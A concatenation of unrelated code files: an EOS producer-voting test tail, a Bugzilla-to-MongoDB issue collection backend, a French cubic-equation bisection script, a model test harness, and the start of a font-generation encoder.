transferAmount="100000000.0000 {0}".format(CORE_SYMBOL)
Print("Transfer funds %s from account %s to %s" % (transferAmount, cluster.eosioAccount.name, account.name))
node.transferFunds(cluster.eosioAccount, account, transferAmount, "test transfer")
trans=node.delegatebw(account, 20000000.0000, 20000000.0000, waitForTransBlock=True, exitOnError=True)
# containers for tracking producers
prodsActive={}
for i in range(0, 4):
node=cluster.getNode(i)
ProducerToNode.populate(node, i)
for prod in node.producers:
prodsActive[prod]=False
#first account will vote for node0 producers, all others will vote for node1 producers
node=node0
for account in accounts:
trans=node.vote(account, node.producers, waitForTransBlock=True)
node=node1
setActiveProducers(prodsActive, node1.producers)
verifyProductionRounds(trans, node2, prodsActive, 2)
# test shifting all 21 away from one node to another
# first account will vote for node2 producers, all others will vote for node3 producers
    node=node1
for account in accounts:
trans=node.vote(account, node.producers, waitForTransBlock=True)
node=node2
setActiveProducers(prodsActive, node2.producers)
verifyProductionRounds(trans, node1, prodsActive, 2)
testSuccessful=True
finally:
TestHelper.shutdown(cluster, walletMgr, testSuccessful, killEosInstances, killWallet, keepLogs, killAll, dumpErrorDetails)
exit(0)
|
the-stack_0_1641 | import sys
import dateutil.parser
from mongoengine import DoesNotExist
import copy
from issueshark.backends.basebackend import BaseBackend
from issueshark.backends.helpers.bugzillaagent import BugzillaAgent
from validate_email import validate_email
import logging
from pycoshark.mongomodels import Issue, People, Event, IssueComment
logger = logging.getLogger('backend')
class BugzillaBackend(BaseBackend):
"""
Backend that collects data from a Bugzilla REST API
"""
@property
def identifier(self):
"""
Identifier (bugzilla)
"""
return 'bugzillaOld'
def __init__(self, cfg, issue_system_id, project_id):
"""
Initialization
Initializes the people dictionary see: :func:`~issueshark.backends.bugzilla.BugzillaBackend._get_people`
Initializes the attribute mapping: Maps attributes from the bugzilla API to our database design
:param cfg: holds als configuration. Object of class :class:`~issueshark.config.Config`
:param issue_system_id: id of the issue system for which data should be collected. :class:`bson.objectid.ObjectId`
:param project_id: id of the project to which the issue system belongs. :class:`bson.objectid.ObjectId`
"""
super().__init__(cfg, issue_system_id, project_id)
logger.setLevel(self.debug_level)
self.bugzilla_agent = None
self.people = {}
self.at_mapping = {
'assigned_to_detail': 'assignee_id',
'blocks': 'issue_links',
'component': 'components',
'creation_time': 'created_at',
'creator_detail': 'creator_id',
'depends_on': 'issue_links',
'dupe_of': 'issue_links',
'keywords': 'labels',
'last_change_time': 'updated_at',
'op_sys': 'environment',
'platform': 'platform',
'resolution': 'resolution',
'severity': 'priority',
'status': 'status',
'summary': 'title',
'target_milestone': 'fix_versions',
'version': 'affects_versions'
}
def process(self):
"""
Gets all the issues and their updates
1. Gets the last stored issues updated_at field
2. Gets all issues that was last change since this value
3. Processes the results in 50-steps
4. For each issue calls: :func:`issueshark.backends.bugzilla.BugzillaBackend._process_issue`
"""
self.bugzilla_agent = BugzillaAgent(logger, self.config)
# Get last modification date (since then, we will collect bugs)
last_issue = Issue.objects(issue_system_id=self.issue_system_id).order_by('-updated_at')\
.only('updated_at').first()
starting_date = None
if last_issue is not None:
starting_date = last_issue.updated_at
# Get all issues
issues = self.bugzilla_agent.get_bug_list(last_change_time=starting_date, limit=50)
# If no new bugs found, return
if len(issues) == 0:
logger.info('No new issues found. Exiting...')
sys.exit(0)
# Otherwise, go through all issues
processed_results = 50
while len(issues) > 0:
logger.info("Processing %d issues..." % len(issues))
for issue in issues:
logger.info("Processing issue %s" % issue['id'])
self._process_issue(issue)
# Go through the next issues
issues = self.bugzilla_agent.get_bug_list(last_change_time=starting_date, limit=50, offset=processed_results)
processed_results += 50
def _process_issue(self, issue):
"""
Processes the issue in several steps:
1. Get all comments. See: :func:`issueshark.backends.helpers.bugzillaagent.BugzillaAgent.get_comments`
2. Get the whole issue history.\
See: :func:`issueshark.backends.helpers.bugzillaagent.BugzillaAgent.get_issue_history`
3. Transforms the issue to our issue model. \
See: :func:`issueshark.backends.bugzilla.BugzillaBackend._transform_issue`
4. Go through the history of the issue (newest to oldes) and set back the issue step by step. During this \
processing: Store the events. See: :func:`issueshark.backends.bugzilla.BugzillaBackend._process_event`
5. Process all comments. See: :func:`issueshark.backends.bugzilla.BugzillaBackend._process_comments`
:param issue: issue that was got from the bugzilla REST API
"""
# Transform issue
comments = self.bugzilla_agent.get_comments(issue['id'])
histories = self.bugzilla_agent.get_issue_history(issue['id'])
mongo_issue = self._transform_issue(issue, comments)
logger.debug('Transformed issue: %s', mongo_issue)
# Go through history
# 1) Set back issue
# 2) Store events
j = 0
events_to_insert = []
for history in reversed(histories):
i = 0
change_date = dateutil.parser.parse(history['when'])
author_id = self._get_people(history['who'])
for bz_event in history['changes']:
logger.debug("Processing event: %s" % bz_event)
unique_event_id = str(issue['id'])+"%%"+str(i)+"%%"+str(j)
mongo_event, is_new_event = self._process_event(unique_event_id, bz_event, mongo_issue, change_date,
author_id)
logger.debug('Newly created?: %s, Resulting event: %s' % (is_new_event, mongo_event))
# Append to list if event is not stored in db
if is_new_event:
events_to_insert.append(mongo_event)
i += 1
j += 1
# Update issue to the original version
mongo_issue.save()
# Store events
if events_to_insert:
Event.objects.insert(events_to_insert, load_bulk=False)
# Store comments
self._process_comments(mongo_issue.id, comments)
def _process_comments(self, mongo_issue_id, comments):
"""
Processes the comments for an issue
:param mongo_issue_id: Object of class :class:`bson.objectid.ObjectId`. Identifier of the document that holds
the issue information
:param comments: comments that were received from the bugzilla API
"""
# Go through all comments of the issue
comments_to_insert = []
logger.info('Processing %d comments...' % (len(comments)-1))
i = -1
for comment in comments:
# Comment with count 0 is the description of the bug
if comment['count'] == 0:
continue
i += 1
logger.debug('Processing comment: %s' % comment)
unique_comment_id = "%s%%%s" % (mongo_issue_id, i)
try:
IssueComment.objects(external_id=unique_comment_id, issue_id=mongo_issue_id).get()
continue
except DoesNotExist:
mongo_comment = IssueComment(
external_id=unique_comment_id,
issue_id=mongo_issue_id,
created_at=dateutil.parser.parse(comment['creation_time']),
author_id=self._get_people(comment['creator']),
comment=comment['text'],
)
logger.debug('Resulting comment: %s' % mongo_comment)
comments_to_insert.append(mongo_comment)
# If comments need to be inserted -> bulk insert
if comments_to_insert:
IssueComment.objects.insert(comments_to_insert, load_bulk=False)
def _process_event(self, unique_event_id, bz_event, mongo_issue, change_date, author_id):
"""
Processes the event. During the event processing the Issue is set back to its original state
before the event occured.
:param unique_event_id: unique identifier of the event
:param bz_event: event that was received from the bugzilla API
:param mongo_issue: issue that is/should be stored in the mongodb
:param change_date: date when the event was created
:param author_id: :class:`bson.objectid.ObjectId` of the author of the event
"""
is_new_event = True
try:
mongo_event = Event.objects(external_id=unique_event_id, issue_id=mongo_issue.id).get()
is_new_event = False
except DoesNotExist:
mongo_event = Event(
external_id=unique_event_id,
issue_id=mongo_issue.id,
created_at=change_date,
author_id=author_id
)
# We need to map back the status from the bz terminology to ours. Special: The assigned_to must be mapped to
# assigned_to_detail beforehand, as we are using this for the issue parsing
if bz_event['field_name'] == 'assigned_to':
bz_at_name = 'assigned_to_detail'
else:
bz_at_name = bz_event['field_name']
try:
mongo_event.status = self.at_mapping[bz_at_name]
except KeyError:
logger.warning('Mapping for attribute %s not found.' % bz_at_name)
mongo_event.status = bz_at_name
# Check if the mongo_issue has the attribute.
# If yes: We can use the mongo_issue to set the old and new value of the event
# If no: We use the added / removed fields
if hasattr(mongo_issue, mongo_event.status):
mongo_event.new_value = copy.deepcopy(getattr(mongo_issue, mongo_event.status))
self._set_back_mongo_issue(mongo_issue, mongo_event.status, bz_event)
mongo_event.old_value = copy.deepcopy(getattr(mongo_issue, mongo_event.status))
else:
mongo_event.new_value = bz_event['added']
mongo_event.old_value = bz_event['removed']
return mongo_event, is_new_event
def _set_back_mongo_issue(self, mongo_issue, mongo_at_name, bz_event):
"""
Method to set back the issue stored in the mongodb
:param mongo_issue: issue stored in the mongodb
:param mongo_at_name: attribute name of the field of the issue document
:param bz_event: event from the bugzilla api
"""
function_mapping = {
'title': self._set_back_string_field,
'priority': self._set_back_priority,
'status': self._set_back_string_field,
'affects_versions': self._set_back_array_field,
'components': self._set_back_array_field,
'labels': self._set_back_array_field,
'resolution': self._set_back_string_field,
'fix_versions': self._set_back_array_field,
'assignee_id': self._set_back_assignee,
'issue_links': self._set_back_issue_links,
'environment': self._set_back_string_field,
'platform': self._set_back_string_field
}
correct_function = function_mapping[mongo_at_name]
correct_function(mongo_issue, mongo_at_name, bz_event)
def _set_back_priority(self, mongo_issue, mongo_at_name, bz_event):
"""
Sets back the priority of the issue before the event
:param mongo_issue: issue stored in the mongodb
:param mongo_at_name: attribute name of the field of the issue document
:param bz_event: event from the bugzilla api
"""
if bz_event['removed'] == 'enhancement':
mongo_issue.issue_type = 'Enhancement'
else:
mongo_issue.issue_type = 'Bug'
mongo_issue.priority = bz_event['removed']
def _set_back_issue_links(self, mongo_issue, mongo_at_name, bz_event):
"""
Sets back the link to the issue before the event
:param mongo_issue: issue stored in the mongodb
:param mongo_at_name: attribute name of the field of the issue document
:param bz_event: event from the bugzilla api
"""
type_mapping = {
'blocks': 'Blocker',
'dupe_of': 'Duplicate',
'depends_on': 'Dependent',
}
item_list = getattr(mongo_issue, mongo_at_name)
# Everything that is in "removed" must be added
if bz_event['removed']:
issue_id = self._get_issue_id_by_system_id(bz_event['removed'])
if issue_id not in [entry['issue_id'] for entry in item_list]:
item_list.append({'issue_id': issue_id, 'type': type_mapping[bz_event['field_name']],
'effect': bz_event['field_name']})
# Everything that is in "added" must be removed
if bz_event['added']:
issue_id = self._get_issue_id_by_system_id(bz_event['added'])
found_index = 0
for stored_issue in item_list:
if stored_issue['issue_id'] == issue_id:
break
found_index += 1
try:
del item_list[found_index]
except IndexError:
logger.warning('Could not process event %s completely. Did not found issue to delete Issue %s' %
(bz_event, mongo_issue))
setattr(mongo_issue, mongo_at_name, item_list)
def _set_back_assignee(self, mongo_issue, mongo_at_name, bz_event):
"""
Sets back the assignee of the issue before the event
:param mongo_issue: issue stored in the mongodb
:param mongo_at_name: attribute name of the field of the issue document
:param bz_event: event from the bugzilla api
"""
if bz_event['removed']:
setattr(mongo_issue, mongo_at_name, self._get_people(bz_event['removed']))
else:
setattr(mongo_issue, mongo_at_name, None)
def _set_back_string_field(self, mongo_issue, mongo_at_name, bz_event):
"""
Sets back normal string fields, e.g., title, of the issue before the event
:param mongo_issue: issue stored in the mongodb
:param mongo_at_name: attribute name of the field of the issue document
:param bz_event: event from the bugzilla api
"""
setattr(mongo_issue, mongo_at_name, bz_event['removed'])
def _set_back_array_field(self, mongo_issue, mongo_at_name, bz_event):
"""
Sets back array fields, e.g., components, of the issue before the event
:param mongo_issue: issue stored in the mongodb
:param mongo_at_name: attribute name of the field of the issue document
:param bz_event: event from the bugzilla api
"""
item_list = getattr(mongo_issue, mongo_at_name)
# Everything that is in "added" must be removed
if bz_event['added']:
# We try to remove the item. If it is not in there, we remove the whole list. Observations showed,
# that this is most likely the correct decision
try:
item_list.remove(bz_event['added'])
except ValueError:
item_list.clear()
# Everything that is in "removed" must be added
if bz_event['removed'] and bz_event['removed'] not in item_list:
item_list.append(bz_event['removed'])
setattr(mongo_issue, mongo_at_name, item_list)
def _parse_bz_field(self, bz_issue, at_name_bz):
"""
Parses fields from the bugzilla issue
:param bz_issue: bugzilla issue (returned by the API)
:param at_name_bz: attribute name that should be parsed
"""
field_mapping = {
'assigned_to_detail': self._parse_author_details,
'blocks': self._parse_issue_links,
'component': self._parse_string_field,
'creation_time': self._parse_date_field,
'creator_detail': self._parse_author_details,
'depends_on': self._parse_issue_links,
'dupe_of': self._parse_issue_links,
'keywords': self._parse_array_field,
'last_change_time': self._parse_date_field,
'op_sys': self._parse_string_field,
'platform': self._parse_string_field,
'resolution': self._parse_string_field,
'severity': self._parse_string_field,
'status': self._parse_string_field,
'summary': self._parse_string_field,
'target_milestone': self._parse_string_field,
'version': self._parse_string_field,
}
correct_function = field_mapping.get(at_name_bz)
return correct_function(bz_issue, at_name_bz)
def _parse_author_details(self, bz_issue, at_name_bz):
"""
Parses author details from the bugzilla issue
:param bz_issue: bugzilla issue (returned by the API)
:param at_name_bz: attribute name that should be parsed
"""
if 'email' in bz_issue[at_name_bz]:
return self._get_people(bz_issue[at_name_bz]['name'], bz_issue[at_name_bz]['email'],
bz_issue[at_name_bz]['real_name'])
else:
return self._get_people(bz_issue[at_name_bz]['name'])
def _parse_string_field(self, bz_issue, at_name_bz):
"""
Parses string fields from the bugzilla issue
:param bz_issue: bugzilla issue (returned by the API)
:param at_name_bz: attribute name that should be parsed
"""
return bz_issue[at_name_bz]
def _parse_array_field(self, bz_issue, at_name_bz):
"""
Parses array fields from the bugzilla issue
:param bz_issue: bugzilla issue (returned by the API)
:param at_name_bz: attribute name that should be parsed
"""
return bz_issue[at_name_bz]
def _parse_issue_links(self, bz_issue, at_name_bz):
"""
Parses the issue links from the bugzilla issue
:param bz_issue: bugzilla issue (returned by the API)
:param at_name_bz: attribute name that should be parsed
"""
type_mapping = {
'blocks': 'Blocker',
'dupe_of': 'Duplicate',
'depends_on': 'Dependent',
}
issue_links = []
if isinstance(bz_issue[at_name_bz], list):
for link in bz_issue[at_name_bz]:
issue_links.append({
'issue_id': self._get_issue_id_by_system_id(link),
'type': type_mapping[at_name_bz],
'effect': at_name_bz
})
else:
if bz_issue[at_name_bz] is not None:
issue_links.append({
'issue_id': self._get_issue_id_by_system_id(bz_issue[at_name_bz]),
'type': type_mapping[at_name_bz],
'effect': at_name_bz
})
return issue_links
def _parse_date_field(self, bz_issue, at_name_bz):
"""
Parses the date field from the bugzilla issue
:param bz_issue: bugzilla issue (returned by the API)
:param at_name_bz: attribute name that should be parsed
"""
return dateutil.parser.parse(bz_issue[at_name_bz])
def _transform_issue(self, bz_issue, bz_comments):
"""
Transforms the issue from an bugzilla issue to our issue model
:param bz_issue: bugzilla issue (returned by the API)
:param bz_comments: comments to the bugzilla issue (as the first comment is the description of the issue)
:return:
"""
try:
mongo_issue = Issue.objects(issue_system_id=self.issue_system_id, external_id=str(bz_issue['id'])).get()
except DoesNotExist:
mongo_issue = Issue(
issue_system_id=self.issue_system_id,
external_id=str(bz_issue['id'])
)
# Set fields that can be directly mapped
for at_name_bz, at_name_mongo in self.at_mapping.items():
if isinstance(getattr(mongo_issue, at_name_mongo), list):
# Get the result and the current value and merge it together
result = self._parse_bz_field(bz_issue, at_name_bz)
current_value = getattr(mongo_issue, at_name_mongo, list())
if not isinstance(result, list):
result = [result]
# Extend
current_value.extend(result)
if len(current_value) > 0 and at_name_mongo == 'issue_links':
current_value = list({v['issue_id']: v for v in current_value}.values())
else:
current_value = list(set(current_value))
# Set the attribute
setattr(mongo_issue, at_name_mongo, copy.deepcopy(current_value))
else:
setattr(mongo_issue, at_name_mongo, self._parse_bz_field(bz_issue, at_name_bz))
# The first comment is the description! Bugzilla does not have a separate description field. The comment
# with the count == 0 is the description
for comment in bz_comments:
if comment['count'] == 0:
mongo_issue.desc = comment['text']
break
# Bugzilla does not have a separate field for the type. Therefore, we distinguish between bug an enhancement
# based on the severity information
if bz_issue['severity'] == 'enhancement':
mongo_issue.issue_type = 'Enhancement'
else:
mongo_issue.issue_type = 'Bug'
return mongo_issue.save()
def _get_mongo_attribute(self, field_name):
"""
Maps the attirbutes of the bugzilla api to the attributes of the document stored in the mongodb
:param field_name: field name that should be mapped
"""
return self.at_mapping[field_name]
def _get_people(self, username, email=None, name=None):
"""
Gets people from the people collection
:param username: username of the user
:param email: email of the user
:param name: name of the user
"""
# Check if user was accessed before. This reduces the amount of API requests
if username in self.people:
return self.people[username]
# If email and name are not set, make a request to get the user
if email is None and name is None:
user = self.bugzilla_agent.get_user(username)
# If the user is not found, we must use the username name
if user is None:
email = None
name = username
else:
email = user['email']
name = user['real_name']
# Check if email is none, this can happen as an email address may be excluded from the return value
if email is None:
# Check if the username is a valid email address, if yes use this
if validate_email(username):
email = username
else:
email = "[email protected]"
# Replace the email address "anonymization"
email = email.replace(' at ', '@').replace(' dot ', '.')
people_id = People.objects(name=name, email=email).upsert_one(name=name, email=email, username=username).id
self.people[username] = people_id
return people_id
def _get_issue_id_by_system_id(self, system_id):
"""
Gets the issue by their id that was assigned by the bugzilla ITS
:param system_id: id of the issue in the bugzilla ITS
"""
try:
issue_id = Issue.objects(issue_system_id=self.issue_system_id, external_id=str(system_id)).only('id').get().id
except DoesNotExist:
issue_id = Issue(issue_system_id=self.issue_system_id, external_id=str(system_id)).save().id
return issue_id
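# Note: events and comments are deduplicated through the synthetic external ids built above --
# str(bug_id) + "%%" + change_index + "%%" + history_index for events, and
# "<mongo issue id>%<comment index>" for comments (the "%s%%%s" format yields a single percent
# sign) -- so re-running the backend only inserts documents that are not already stored.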
|
the-stack_0_1644 | # commentaire
# resolution approchée d'une equation du troisième degre
# version 2
import math
# Fonction calcul de delta
def calculerDelta(a, b, c):
return b**2-4*a*c
# Function solving a second-degree (quadratic) equation
def resoudreEquationSecondDegre(a, b, c):
delta = calculerDelta(a, b, c)
if delta > 0:
racineDeDelta = math.sqrt(delta)
retour = [(-b-racineDeDelta)/(2*a), (-b+racineDeDelta)/(2*a)]
elif delta < 0:
retour = [] # liste vide
else:
retour = [-b/(2*a)] # liste d'un seul élément
return retour
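# Illustrative example (not from the original script): for x^2 - 3x + 2 = 0 the discriminant
# is 1 > 0, so resoudreEquationSecondDegre(1, -3, 2) returns both roots [1.0, 2.0]; a zero
# discriminant yields a one-element list and a negative discriminant an empty list.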
# Function computing the value of f(x) = ax^3 + bx^2 + cx + d
def calculerFxPolynome3dg(x, a, b, c, d):
return a*x**3 + b*x**2 + c*x + d
# Function comparing the signs of two numbers: True = same sign, False = opposite signs
def compareSign(x, y):
if(x > 0 and y > 0) or (x < 0 and y < 0):
return True
else:
return False
# Function iterating 100 times (bisection) between two values x1 and x2, with f(x1) and f(x2) of opposite signs, returning the value x approaching f(x)=0
def trouverFxEgal0(p1, p2, a, b, c, d):
for i in range(0, 100):
        # To do so, take the point p0 halfway between p1 and p2 and check whether f(p0) is positive or negative
p0 = (p1+p2)/2
        # compute f(p0), f(p1) and f(p2)
fp0 = calculerFxPolynome3dg(p0, a, b, c, d)
fp1 = calculerFxPolynome3dg(p1, a, b, c, d)
fp2 = calculerFxPolynome3dg(p2, a, b, c, d)
# print("itération ", i, " : fp0 = ", fp0," fp1 = ", fp1, " fp2 = ", fp2)
if compareSign(fp0, fp1):
p1 = p0
p2 = p2
else:
p1 = p1
p2 = p0
return p0
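# Illustrative example (not from the original script): trouverFxEgal0 is a fixed 100-step
# bisection, so for f(x) = x^3 - x - 2 (a=1, b=0, c=-1, d=-2), which changes sign between
# x=1 and x=2, trouverFxEgal0(1, 2, 1, 0, -1, -2) converges to the real root near x = 1.5214.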
# read the parameters of the function f with the input function
# input returns a string, so the float function converts it
# to a decimal value
print("Saisir les paramètres a,b,c,d de votre polynome du troisième degré a^3 + bx^2 + cx + d:")
a = float(input("Saisir la valeur de a="))
b = float(input("Saisir la valeur de b="))
c = float(input("Saisir la valeur de c="))
d = float(input("Saisir la valeur de d="))
# Compute the parameters of the derivative function f'
A = 3*a
B = 2*b
C = c
print("La dérivée f' de la fonction f est ", A, "x^2 + ", B, "x + ", C)
# Solve and display the second-degree equation f'
print("Résolution de l'équation f' ", A, "x^2 + ", B, "x + ", C)
delta = calculerDelta(A, B, C)
result = resoudreEquationSecondDegre(A, B, C)
# Branch on the delta of f', in this order: >0, then ==0, then <0
if delta > 0:
    # Order the results x1 and x2, solutions of the equation f'(x)=0
if result[0] > result[1]:
x1 = result[1]
x2 = result[0]
else:
x1 = result[0]
x2 = result[1]
print("Delta de f' est positif donc il y a 2 solutions")
print("x1 =", x1)
print("x2 =", x2)
    # Determine the variations of f depending on the value of Delta and the sign of A
if A > 0:
print("Delta de f' est positif ainsi que A donc les variations de f(x) sont les suivantes :")
print("pour x < ", x1, " f(x) est croissante")
print("pour ", x1, " < x < ", x2, " f(x) est decroissante")
print("pour x > ", x2, " f(x) est croissante")
else: # A est négatif
print("Delta de f' est positif et A est négatif donc les variations de f(x) sont les suivantes :")
print("pour x < ", result[0], " f(x) est décroissante")
print("pour ", result[0], " < x < ", result[1], " f(x) est croissante")
print("pour x > ", result[1], " f(x) est décroissante")
    # Compute f(x1) and f(x2), the extrema of f, for Delta > 0 and A positive or negative
print("Calculons f(x1) et f(x2), extremum de f")
f1 = calculerFxPolynome3dg(x1, a, b, c, d)
f2 = calculerFxPolynome3dg(x2, a, b, c, d)
print("f1 =", f1)
print("f2 =", f2)
if (f1 < 0 and f2 > 0) or (f1 > 0 and f2 < 0):
print("Cas ou f1 et f2 sont de signes oposés. Il y a donc une solution f(x) = 0 pour x compris entre x1 et x2")
# Approchons la solution f(x) = 0 pour x compris entre x1 et x2
# ---------------------------------------------------------------
# Faisons une boucle qui calcul f(x) pour x compris entre x1 et x2
p1 = x1
p2 = x2
p0 = trouverFxEgal0(p1, p2, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x compris entre x1 et x2 après n itérations : ", p0)
print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
# Approchons la solution f(x) = 0 pour x < x1
# ----------------------------------------------------
# trouvons un point x0 inférieur à x1 de sorte que f(x0) soit de signe opposé à f(x1)
x0 = x1 - 1
while compareSign(calculerFxPolynome3dg(x0, a, b, c, d), calculerFxPolynome3dg(x1, a, b, c, d)):
x0 = x0 - 1
print(
"Valeur de x0 de sorte que f(x0) et f(x1) soient de signe opposé avec x < x1 : ", x0)
print("Valeur de f(x0) ", calculerFxPolynome3dg(x0, a, b, c, d))
print("Valeur de f(x1) ", calculerFxPolynome3dg(x1, a, b, c, d))
p0 = trouverFxEgal0(x0, x1, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x < x1 après n itérations : ", p0)
print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
# Approchons la solution f(x) = 0 pour x > x2
# ----------------------------------------------------
# trouvons un point x0 supérieur à x2 de sorte que f(x0) soit de signe opposé à f(x2)
x0 = x2 + 1
while compareSign(calculerFxPolynome3dg(x0, a, b, c, d), calculerFxPolynome3dg(x2, a, b, c, d)):
x0 = x0 + 1
print(
"Valeur de x0 de sorte que f(x0) et f(x2) soient de signe opposé avec x > x2 : ", x0)
print("Valeur de f(x0) ", calculerFxPolynome3dg(x0, a, b, c, d))
print("Valeur de f(x2) ", calculerFxPolynome3dg(x1, a, b, c, d))
p0 = trouverFxEgal0(x0, x2, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x > x2 après n itérations : ", p0)
print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
else: # les extremums sont de mêmes signes
print("Cas ou f1 et f2 sont de même signes. Il n'y a donc pas de solution f(x) = 0 pour x compris entre x1 et x2")
if compareSign(f1, A):
print(
"f1 et A sont de même signe. Donc, il existe une solution x telle que f(x)=0 pour x < x1")
# Approchons la solution f(x) = 0 pour x < x1
# ----------------------------------------------------
# trouvons un point x0 inférieur à x1 de sorte que f(x0) soit de signe opposé à f(x1)
x0 = x1 - 1
while compareSign(calculerFxPolynome3dg(x0, a, b, c, d), calculerFxPolynome3dg(x1, a, b, c, d)):
x0 = x0 - 1
print(
"Valeur de x0 de sorte que f(x0) et f(x1) soient de signe opposé avec x < x1 : ", x0)
print("Valeur de f(x0) ", calculerFxPolynome3dg(x0, a, b, c, d))
print("Valeur de f(x1) ", calculerFxPolynome3dg(x1, a, b, c, d))
p0 = trouverFxEgal0(x0, x1, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x < x1 après n itérations : ", p0)
print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
else:
print(
"f1 et A sont de signe opposé. Donc, il existe une solution x telle que f(x)=0 pour x > x2")
# Approchons la solution f(x) = 0 pour x > x2
# ----------------------------------------------------
# trouvons un point x0 supérieur à x2 de sorte que f(x0) soit de signe opposé à f(x2)
x0 = x2 + 1
while compareSign(calculerFxPolynome3dg(x0, a, b, c, d), calculerFxPolynome3dg(x2, a, b, c, d)):
x0 = x0 + 1
print(
"Valeur de x0 de sorte que f(x0) et f(x2) soient de signe opposé avec x > x2 : ", x0)
print("Valeur de f(x0) ", calculerFxPolynome3dg(x0, a, b, c, d))
print("Valeur de f(x2) ", calculerFxPolynome3dg(x1, a, b, c, d))
p0 = trouverFxEgal0(x0, x2, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x > x2 après n itérations : ", p0)
print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
else:  # Delta is zero or negative
if delta == 0:
print("The delta of f' is zero, so there is a single solution")
print("x0 =", result[0])
# Determine the variations of f from the value of delta and the sign of A
if A > 0:
print("The delta of f' is zero and A is positive, so f is always increasing")
else:  # A is negative
print("The delta of f' is zero and A is negative, so f is always decreasing")
else:
print("No solution over the real numbers for f'(x) = 0")
# Determine the variations of f from the value of delta and the sign of A
if A > 0:
print("The delta of f' is negative and A is positive, so f is always increasing")
else:  # A is negative
print("The delta of f' is negative and A is negative, so f is always decreasing")
# Find a value of x such that f(0) and f(x) have opposite signs.
# To do so, compare the signs of A and d to determine whether the x giving f(x) = 0 is positive or negative
if compareSign(A, d):
# Approximate the solution f(x) = 0 for x < 0
# ----------------------------------------------------
# find a point x0 below 0 such that f(x0) has the opposite sign of d
x0 = -1
while compareSign(calculerFxPolynome3dg(x0, a, b, c, d), d):
x0 = x0 - 1
print("Value of x0 such that f(x0) and d have opposite signs with x < 0: ", x0)
print("Value of f(x0): ", calculerFxPolynome3dg(x0, a, b, c, d))
p0 = trouverFxEgal0(x0, 0, a, b, c, d)
print("Approximate value p0 of x such that f(x) = 0 with x < 0 after n iterations: ", p0)
print("Value of f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
else:
# Approximate the solution f(x) = 0 for x > 0
# ------------------------------------------
# find a point x0 above 0 such that f(x0) has the opposite sign of d
x0 = 1
while compareSign(calculerFxPolynome3dg(x0, a, b, c, d), d):
x0 = x0 + 1
print("Value of x0 such that f(x0) and d have opposite signs with x > 0: ", x0)
print("Value of f(x0): ", calculerFxPolynome3dg(x0, a, b, c, d))
p0 = trouverFxEgal0(x0, 0, a, b, c, d)
print("Approximate value p0 of x such that f(x) = 0 with x > 0 after n iterations: ", p0)
print("Value of f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
|
the-stack_0_1646 | import torch
import os
import configs
import datasets
import models
class BaseTest(object):
def __init__(self, model):
self.model = model
def run(self):
for model_cfg in models.allcfgs():
if hasattr(model_cfg, 'name') and model_cfg.name == self.model.__name__:
model_name = os.path.splitext(os.path.split(model_cfg._path)[1])[0]
print('Testing model: ' + model_name + ' ...')
for data_cfg in datasets.allcfgs():
if not self.model.check_cfg(data_cfg, model_cfg):
continue
data_name = os.path.splitext(os.path.split(data_cfg._path)[1])[0]
print('\tTesting dataset: ' + data_name + ' ...')
data_cfg.index_cross = 1
sample_dict = dict()
for name, value in vars(data_cfg).items():
if name.startswith('source') or name.startswith('target'):
kernel = getattr(data_cfg, 'kernel' if name.startswith('source') else 'out_kernel', None)
if kernel is not None:
sample_shape = (kernel.kT, kernel.kW, kernel.kH)
sample_dict[name] = torch.randn(configs.env.ci.batchsize, *sample_shape)
else:
sample_shape = (value.time, value.width, value.height) \
if hasattr(value, 'time') else [value.elements]
sample_dict[name] = torch.randint(value.classes, (configs.env.ci.batchsize, 1)).long() \
if len(sample_shape) == 1 and sample_shape[0] == 1 \
else torch.randn(configs.env.ci.batchsize, *sample_shape)
print("\t-- " + name + " size: ", end="")
print(sample_dict[name].size())
for run_cfg in configs.Run.all():
run_name = os.path.splitext(os.path.split(run_cfg._path)[1])[0]
print('\t\tTesting config: ' + run_name + ' ...')
model = self.model(model_cfg, data_cfg, run_cfg)
params, params_all = dict(), 0
for name, value in model.modules().items():
params[name] = sum(p.numel() for p in value.parameters() if p.requires_grad)
params_all += params[name]
print("\t\t-- parameter(s): ", end="")
print(params)
print("\t\t-- all parameters: ", end="")
print(params_all)
loss_dict = model.train(0, sample_dict)
print("\t\t-- loss(es): ", end="")
print(loss_dict)
result_dict = model.test(0, sample_dict)
for name, value in result_dict.items():
result_dict[name] = value.shape
print("\t\t-- result(s) size: ", end="")
print(result_dict)
print("\t\t-- save folder: ", end="")
print(model.getpath())
save_folder = os.path.join("test", model_name, data_name + '-' + run_name)
model.save(epoch=0, path=save_folder)
model.load(path=save_folder)
print('')
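# Hedged usage sketch (model class name and import path are hypothetical; assumes the models
# package exposes a class with the check_cfg/train/test/save/load interface used above):
#
#     # from models.my_model import MyModel
#     # BaseTest(MyModel).run()   # exercises every matching model/data/run config combination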
|
the-stack_0_1647 | """
LF-Font
Copyright (c) 2020-present NAVER Corp.
MIT license
"""
from functools import partial
import torch.nn as nn
import torch
from base.modules import ConvBlock, ResBlock, GCBlock, CBAM
class ComponentConditionBlock(nn.Module):
def __init__(self, in_shape, n_comps):
super().__init__()
self.in_shape = in_shape
self.bias = nn.Parameter(torch.zeros(n_comps, in_shape[0], 1, 1), requires_grad=True)
def forward(self, x, comp_id=None):
out = x
if comp_id is not None:
b = self.bias[comp_id]
out += b
return out
class ComponentEncoder(nn.Module):
def __init__(self, n_comps):
super().__init__()
ConvBlk = partial(ConvBlock, norm="in", activ="relu", pad_type="zero")
ResBlk = partial(ResBlock, norm="in", activ="relu", pad_type="zero", scale_var=False)
C = 32
self.layers = nn.ModuleList([
ConvBlk(1, C, 3, 1, 1, norm='none', activ='none'), # 128x128
ConvBlk(C*1, C*2, 3, 1, 1, downsample=True), # 64x64
GCBlock(C*2),
ConvBlk(C*2, C*4, 3, 1, 1, downsample=True), # 32x32
CBAM(C*4),
